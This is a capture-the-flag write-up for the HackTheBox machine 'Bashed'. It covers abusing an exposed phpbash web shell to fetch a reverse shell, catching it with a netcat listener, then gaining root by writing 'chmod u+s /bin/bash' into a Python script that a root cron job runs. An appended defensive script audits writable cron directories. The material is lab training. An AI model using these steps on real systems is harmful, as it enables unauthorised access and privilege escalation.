Bashed Writeup - HackTheBox
Hello, welcome to the Bashed Writeup from HackTheBox.
Enumeration
NMAP Open ports
In the first step, we enumerate the list of open ports with NMAP.
Port 80: HTTP
Whatweb
As we can see in the above image, we have a web server running on port 80, so let's take a look.
We found phpbash. It seems to be a tool that was actually developed on this server, so let's take a look at it on GitHub: PHPBash
Phpbash is a standalone, semi-interactive web shell. Its main purpose is to assist in penetration tests where traditional reverse shells are not possible. The design is based on the default Kali Linux terminal colors, so pentesters should feel right at home.
In this case, I can imagine that there is a phpbash.php somewhere that we may be able to use, so let's use gobuster to enumerate directories.
After enumerating some directories, we found two PHP scripts in /dev:
Let's find out!
Exploitation
As we saw before, phpbash.php is a web shell, so let's try to use wget to download a PHP reverse shell from our machine; in this case I will use the PentestMonkey one. PHP Reverse Shell
We start an HTTP server in the same directory as the reverse shell:
```console
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```
PHPBash
With wget, I'm going to download the reverse shell from our machine.
Shell as www-data
Now we start the netcat listener on port 443 and navigate to /uploads/ennove.php (yes, an incredible name for a shell…)
```console
nc -nlvp 443
listening on [any] 443 ...
```
After navigating to /uploads/ennove.php, we get a shell.
Flag user
```console
www-data@bashed:/var/www/html/dev$ find / -name user.txt 2>/dev/null
/home/arrexel/user.txt
www-data@bashed:/var/www/html/dev$ cat /home/arrexel/user.txt
FLAG :D
```
Privilege Escalation
Shell as scriptmanager
As www-data, let's check our sudo privileges. In this case we can run any command as scriptmanager, so let's spawn a bash shell as that user.
Shell as root
After enumerating as scriptmanager, we found a folder called scripts with a few files.
```console
scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
total 16
drwxrwxr-- 2 scriptmanager scriptmanager
drwxr-xr-x 23 root root
-rw-r--r-- 1 scriptmanager scriptmanager
-rw-r--r-- 1 root root
```
Let's see the files:
```console
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
testing 123!scriptmanager@bashed:/scripts
```
As we can see, test.py creates test.txt, and root is the owner of that file even though we can modify test.py. So whoever runs the Python scripts is probably root, so let's try to set the setuid bit (u+s) on bash:
Modified test.py
```python
import os
os.system("chmod u+s /bin/bash")
```
After that, we try to run test.py ourselves, but test.txt is created with scriptmanager as owner, so root must somehow be running test.py on its own (maybe a cron job?). Let's try a script to enumerate processes:
```bash
#!/bin/bash
# Snapshot the running commands, then loop and print only the lines that
# appear (>) or disappear (<) between consecutive snapshots.
old_process=$(ps -eo command)
while true; do
    new_process=$(ps -eo command)
    diff <(echo "$old_process") <(echo "$new_process") | grep "[\>\<]" | grep -vE "procmon | command | kworker"
    old_process=$new_process
done
```
```console
chmod +x procmon.sh
./procmon.sh
> /usr/sbin/CRON -f
> /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done
> python test.py
< /usr/sbin/CRON -f
< /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done
< python test.py
```
As we can see, `python test.py` is executed by a cron job at short intervals, so let's wait and watch for the permission change on bash:
```console
scriptmanager@bashed:/scripts$ watch -n 1 ls -la /bin/bash
```
After 1 minute:
```console
scriptmanager@bashed:/scripts$ bash -p
bash-4.3# whoami
root
FLAG :D
```
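The root cause of this escalation is a root cron job running every `*.py` out of a directory that a non-root user owns and that is group-writable. As an added example that is not part of the original writeup, the following Python audit flags exactly those conditions on a directory a privileged cron job executes from; the directory layout it builds in a temp dir is constructed to mirror /scripts on the box, and `audit_cron_dir`, `demo_vulnerable` and `demo_hardened` are hypothetical names.

```python
import os
import stat
import tempfile

ROOT_UID = 0

def _writable_by_others(mode: int) -> bool:
    # Group- or world-writable bits let users other than the owner change the entry.
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_cron_dir(path, suffix=".py", trusted_uids=(ROOT_UID,)):
    """Return findings for a directory whose scripts a root cron job executes."""
    findings = []
    st = os.lstat(path)
    if st.st_uid not in trusted_uids:
        findings.append(f"{path}: directory owned by uid {st.st_uid}, not root")
    if _writable_by_others(st.st_mode):
        # A writable directory lets any group member drop a new *.py that the glob picks up.
        findings.append(f"{path}: directory is group/world-writable ({stat.filemode(st.st_mode)})")
    for name in sorted(os.listdir(path)):
        if not name.endswith(suffix):
            continue
        full = os.path.join(path, name)
        fst = os.lstat(full)
        if fst.st_uid not in trusted_uids:
            findings.append(f"{full}: owned by uid {fst.st_uid}, not root")
        if _writable_by_others(fst.st_mode):
            findings.append(f"{full}: group/world-writable ({stat.filemode(fst.st_mode)})")
    return findings

def _build_and_audit(dir_mode, file_mode, trusted_uids):
    # Constructed layout mirroring /scripts on Bashed: a single test.py inside the directory.
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, dir_mode)
        script = os.path.join(d, "test.py")
        with open(script, "w") as f:
            f.write('open("test.txt", "w").write("testing 123!")\n')
        os.chmod(script, file_mode)
        return audit_cron_dir(d, trusted_uids=trusted_uids)

def demo_vulnerable():
    """drwxrwxr-- directory as seen on the box: flagged as group-writable."""
    return _build_and_audit(0o774, 0o644, (ROOT_UID,))

def demo_hardened():
    """0755 directory, 0644 script, trusted owner: no findings."""
    return _build_and_audit(0o755, 0o644, (os.getuid(),))
```

Running `demo_vulnerable()` on a real host would be replaced by `audit_cron_dir("/scripts")`; anything it reports is a path a non-root user can use to change what root executes.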